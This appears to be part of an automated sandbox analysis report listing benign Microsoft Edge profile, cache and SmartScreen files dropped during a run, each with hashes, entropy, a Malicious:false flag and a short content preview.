                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36b4e.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36b7d.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38a6e.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38abd.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):8.280239615765425E-4
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.81240594570408E-4
                                Encrypted:false
                                SSDEEP:3:LsNlHHu:Ls3u
                                MD5:1C2AF8A99869A4C1AE09C316EF1822F6
                                SHA1:83BBE8AF8DD085CF1336F03488402C2350536408
                                SHA-256:C06A5640D9310FA8EBA45913EA056EDD2C4911F392C9505871B7BB402A55F8F1
                                SHA-512:27281BD99A8FC197F99D10A70CE9BFFB38D71A24A13D9FD1622AE927E5329F510B55A2A5669E5B26B5D296BEA6277067C7BB17F0E48ED6579742A5AE68F7656B
                                Malicious:false
                                Preview:........................................j....x/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):29
                                Entropy (8bit):3.922828737239167
                                Encrypted:false
                                SSDEEP:3:2NGw+K+:fwZ+
                                MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                Malicious:false
                                Preview:customSynchronousLookupUris_0

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):35302
                                Entropy (8bit):7.99333285466604
                                Encrypted:true
                                SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                MD5:0E06E28C3536360DE3486B1A9E5195E8
                                SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                Malicious:false
                                Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):18
                                Entropy (8bit):3.5724312513221195
                                Encrypted:false
                                SSDEEP:3:kDnaV6bVon:kDYa2
                                MD5:5692162977B015E31D5F35F50EFAB9CF
                                SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                Malicious:false
                                Preview:edgeSettings_2.0-0

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-0

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3581
                                Entropy (8bit):4.459693941095613
                                Encrypted:false
                                SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                MD5:BDE38FAE28EC415384B8CFE052306D6C
                                SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                Malicious:false
                                Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):4.493433469104717
                                Encrypted:false
                                SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                Malicious:false
                                Preview:synchronousLookupUris_636976985063396749.rel.v2

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):35302
                                Entropy (8bit):7.99333285466604
                                Encrypted:true
                                SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                MD5:0E06E28C3536360DE3486B1A9E5195E8
                                SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                Malicious:false
                                Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):86
                                Entropy (8bit):4.389669793590032
                                Encrypted:false
                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQOn:YQ3Kq9X0dMgAEiLIMn
                                MD5:03B6D5E81A4DC4D4E6C27BE1E932B9D9
                                SHA1:3C5EF0615314BDB136AB57C90359F1839BDD5C93
                                SHA-256:73B017F7C5ECD629AD41D14147D53F7D3D070C5967E1E571811A6DB39F06EACC
                                SHA-512:0037EB23CCDBDDE93CFEB7B9A223D59D0872D4EC7F5E3CA4F7767A7301E96E1AF1175980DC4F08531D5571AFB94DF789567588DEB2D6D611C57EE4CC05376547
                                Malicious:false
                                Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c63ccea9-6155-4a3e-9806-60911af96e35.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):8243
                                Entropy (8bit):5.7975140948931045
                                Encrypted:false
                                SSDEEP:192:fsNAxMnE7PeiRUtVQck+W+T6qRAq1k8SPxVLZ7VTiQ:fsNAxcEfuqX+d6q3QxVNZTiQ
                                MD5:846392AC951A78AD9BB10E9AD3DE9A1B
                                SHA1:248D97D62E404A600681B04EE22C4B51EF32EB96
                                SHA-256:768AAADBA89CE3555579866E2F4E8BE90C3B494B1A9D2C4BF5EB0DF5FC4F10CD
                                SHA-512:C5499E45DF3296AFCC0D9FFD58171698AD6BE291DA9DBBFAF8B6395561198FA8B4590E7C4A46E62827928F874D72DDD20AFF623589AE4C09D96C1FF74EA0346D
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cc3ce8cc-c0fe-49f8-a2f3-572addd55f97.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7607
                                Entropy (8bit):5.57892737417665
                                Encrypted:false
                                SSDEEP:96:I4qsNk/bhfpMnEeye5ih/cIyURLl8RotonnBjUVvliZQ5e4WJk+cH+Tqb3Q+bE3G:ssNwnMnE7PViRUKfQck+W+R+wUV
                                MD5:AA078F17819B8D353C3BA998456B7DD2
                                SHA1:87A7BEA95251C8823397CB1AD512AFCB41B8899B
                                SHA-256:C4AEB7352DC15D89B87837AF0910CC1911267CE9CF05BC4A821F2D26AE8DC895
                                SHA-512:4FFCA358350E06724008626A3B4AA5176DF5C40DDF763BBA902A9E617E70D5560757637E959890763152730B7D3467FADB8388A645A91DFD14EBFF4800DFA9F9
                                Malicious:false
                                Preview:{"apps_count_check_time":"13361265752358297","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"host_package_checked_on_browser_version":"117.0

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e9193a9f-0556-4503-a315-297ee5e64f8d.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
